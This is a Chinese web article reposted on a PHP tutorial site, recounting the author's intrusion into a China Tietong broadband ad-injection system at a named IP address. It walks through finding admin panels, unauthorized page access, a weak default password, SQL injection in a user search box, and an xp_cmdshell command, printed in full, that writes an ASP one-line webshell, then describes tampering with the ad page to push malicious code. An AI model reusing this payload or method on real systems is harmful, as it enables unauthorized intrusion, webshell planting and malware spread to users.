网站地图    收藏   

主页 > 后端 > 网站安全 >

中国铁通宽带广告投放系统存在严重安全问题

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 最近被铁通恶意插入的广告搞的蛋疼 投诉无门 自己搞定前阶段电脑莫名其妙的随机跳转hao123 一号店等地址 搞的我以为电脑中毒了最近倒是不跳了 不管登陆什么网站 右下角总弹出一些...

最近被铁通恶意插入的广告搞的蛋疼 投诉无门 自己搞定

前阶段电脑莫名其妙的随机跳转hao123 一号店等地址 搞的我以为电脑中毒了

最近倒是不跳了 不管登陆什么网站 右下角总弹出一些风格一样的广告

F12看了一下广告图片的地址

http://61.235.249.195:6699/FilesUp/5e1e6923-4205-452d-bc25-6ed0855cb22a.gif

查下IP地址: 61.235.249.195辽宁省沈阳市 铁通

这不我大铁通的IP么 难道被劫持了?

百度之 果然是运营商劫持 顿时我就不开心了 本来前几天学长们毕业心情就不好 你还给我弹广告!

扫描了一下 找到两个后台地址:

http://61.235.249.195:808

http://61.235.249.195:6789

\

 

简单试了一下弱口令 万能密码 无效...好失落...

丢到wwwsacn里 也没扫到什么用处较大的信息

不过根据以前的经验 猜到这类外观比较挫的网站安全性都比较差 就开始试能不能越权

越权漏洞:

http://61.235.249.195:6789/ManageFrame/left.aspx

不行

http://61.235.249.195:6789/ManageFrame/top.aspx

哎呦 这个可以!虽然用处不大...不过 总比啥都没有强!

\

 

下载了帮助文档...发现原来这个系统还可以DNS劫持!

\

之后又是一顿瞎猜 不过没什么收货了

不过那个个人设置吸引了我的注意力

http://61.235.249.195:6789/Common/UserManage/UserEditOneself.aspx

估计因为没参数 所以内容都是空白的

不过他的文件命名引起了我的兴趣 尝试修改了一下

http://61.235.249.195:6789/Common/UserManage/UserEdit.aspx

哎呦 路径被爆出来了

 

\

换808那个后台再访问下

http://61.235.249.195:808/Common/UserManage/UserEdit.aspx

页面成功加载出来了

\

 

然后 手欠的点了下取消 人品顿时爆发了

http://61.235.249.195:808/Common/UserManage/UserList.aspx

\

 

这个用户有点少 我们换回6789

\

 

我尝试添加了一个用户 成功了 不过登陆时提示未分配角色

但创建用户时的一句话引起了我的注意 

\

 

初始密码为1



越权页面:

http://61.235.249.195:6789/Common/UserManage/UserList.aspx

添加用户

http://61.235.249.195:6789/Common/Common_Role/RoleList.aspx

给予管理权限



密码弱口令:

随便找了个账号 就第一个吧 密码1 哦也 进去了~

 

不过这都不是我的目的啊

我需要的是管理账号给自己的账号加白名单啊!然后我想到了注入!



注入点:

突然想到在http://61.235.249.195:6789/Common/UserManage/UserList.aspx

还有搜功能 会不会存在注入呢?来个引号试试!

人品再次爆发!
 

\

 

然后发现竟然是sa权限 xp_cmdshell还没删除 发完这个漏洞我觉得我应该去买个彩票

路径也有了 直接写shell啊!

直接搜索cttjs';exec master..xp_cmdshell 'echo ^<%eval request(Chr(97))%^>>f:\浙江\IIOSManageWeb_主线08211\Common\UserManage\a.asp';--

写入一句话http://61.235.249.195:808/Common/UserManage/a.asp a

 

\

推送挂马:

入侵期间发现广告的一些管理页面无法访问 做了IP限制?

不过这阻止不了有心的黑客

翻了一下 找到了广告页面的文件 F:\IIIOS素材\Default.aspx

修改下 加点语句 神不知鬼不觉...

 

\\\

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论